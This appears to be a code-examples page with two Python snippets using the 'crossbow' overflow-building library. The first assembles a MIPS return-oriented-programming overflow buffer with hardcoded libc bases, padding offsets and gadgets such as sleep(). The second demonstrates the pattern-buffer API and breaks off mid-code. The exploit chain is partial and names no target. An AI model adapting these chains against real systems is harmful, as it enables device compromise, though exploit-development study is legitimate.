# Select the libc base for the environment this buffer is built for.
# `qemu` is read below but is not defined in this excerpt — presumably set
# earlier in the script; verify before running.
libc_qemu_base=0x4084a000
libc_actual_base=0x2aaee000
libc_base=0

if qemu:
    libc_base=libc_qemu_base
else:
    libc_base=libc_actual_base

# Byte values the buffer must never contain.
# NOTE(review): the list mixes one-character strings with ints; confirm that
# EmptyOverflowBuffer normalizes both forms (the other example on this page
# passes strings only).
badchars=['\0',0x0d,'\n',0x20]

# Little-endian buffer. The small values handed to add_rop_gadget() below are
# presumably offsets added to default_base (libc_base) — confirm against the
# builder. maxlength=2048 is passed as the size limit.
buf=EmptyOverflowBuffer(LittleEndian,default_base=libc_base,badchars=badchars,maxlength=2048)


# 528 bytes of pattern before the first gadget entry.
buf.add_pattern(528)

# function epilogue gadget (see its description string)
buf.add_rop_gadget(0x31b44,
            description="[$ra] function epilogue that sets up $s1-$s7")

# Pad from the current length up to offset 620 so the next entry lands at a
# fixed position regardless of how much precedes it.
buf.add_pattern(620-buf.len())
# address of sleep
buf.add_rop_gadget(0x506c0,
            description="Address of sleep() in libc. be sure to set up $ra and $a0 before calling.")

# Pad to offset 628 before the next entry.
buf.add_pattern(628-buf.len())
# placeholder address that can be dereferenced without crashing, this goes in $s2
buf.add_rop_gadget(0x427a4,
            description="[$s2] placeholder, derefed without crashing.")
Example #2
# 
# See LICENSE.txt for more details.
# 
import sys
import os
sys.path.insert(0,os.path.abspath('..'))

from crossbow.overflow_development.overflowbuilder import EmptyOverflowBuffer
from crossbow.common.support import BigEndian
from crossbow.common.support import Logging

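# Walk through the EmptyOverflowBuffer API: build a pattern buffer, print its
# section layout, and locate a substring within it.
logger=Logging()
logger.LOG_INFO("Creating empty overflow buffer")

# Big-endian buffer that must not contain the bytes 'A', 'B' or '6'.
buf=EmptyOverflowBuffer(BigEndian,badchars=['A','B','6'])
buf.add_pattern(1024)

logger.LOG_INFO("Length of empty overflow buffer: %d" % buf.len())

buf.print_section_descriptions()
print buf.pretty_string()

# find_offset() presumably returns the position of the given pattern substring
# within the buffer — confirm against the builder.
logger.LOG_INFO("Offset of \"u3Au4\": %d" % buf.find_offset("u3Au4"))




logger.LOG_INFO("Creating second empty overflow buffer")

# Second buffer built with the same parameters as the first.
buf2=EmptyOverflowBuffer(BigEndian,badchars=['A','B','6'])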
try: